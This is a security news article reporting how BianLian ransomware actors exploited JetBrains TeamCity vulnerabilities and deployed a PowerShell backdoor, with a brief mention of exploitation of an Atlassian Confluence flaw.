BianLian Threat Actors Utilize JetBrains TeamCity Vulnerabilities in Ransomware Assaults

March 11, 2024

BianLian ransomware actors have been identified exploiting security vulnerabilities in JetBrains TeamCity software to execute their ransom-focused attacks. GuidePoint Security's fresh report, which came in response to a recent breach, reveals that the incident was initiated with the exploitation of a TeamCity server, leading to the deployment of a PowerShell implementation of BianLian's Go backdoor.

BianLian came into existence in June 2022, and following the release of a decryptor in January 2023, it has shifted its focus exclusively towards exfiltration-based extortion. GuidePoint Security observed an attack chain which starts with the exploitation of a susceptible TeamCity instance using either CVE-2024-27198 or CVE-2023-42793 to gain initial access. This is followed by the creation of new users in the build server and the execution of malicious commands for post-exploitation and lateral movement. It remains uncertain which of the two vulnerabilities were utilized by the threat actor for infiltration.

Known for their custom backdoor written in Go, tailored to each victim, the BianLian actors also drop remote desktop tools such as AnyDesk, Atera, SplashTop, and TeamViewer. Microsoft has tracked this backdoor as BianDoor. Justin Timothy, Gabe Renfro, and Keven Murphy, security researchers, stated, 'After multiple failed attempts to execute their standard Go backdoor, the threat actor pivoted to living-off-the-land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their Go backdoor.'

The obfuscated PowerShell backdoor, referred to as 'web.ps1', is designed to create a TCP socket for further network communication to a server controlled by the actor, permitting the remote attackers to perform arbitrary actions on an infected host. The researchers added, 'The now-confirmed backdoor is able to communicate with the [command-and-control] server and asynchronously execute based on the remote attacker's post-exploitation objectives.'

The revelation comes as new proof-of-concept (PoC) exploits for a critical security flaw affecting Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527) have been detailed. This flaw could lead to remote code execution in a fileless manner and load the Godzilla web shell directly into memory. Over the past two months, this flaw has been weaponized to deploy C3RB3R ransomware, cryptocurrency miners, and remote access trojans, indicating broad exploitation in the wild.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.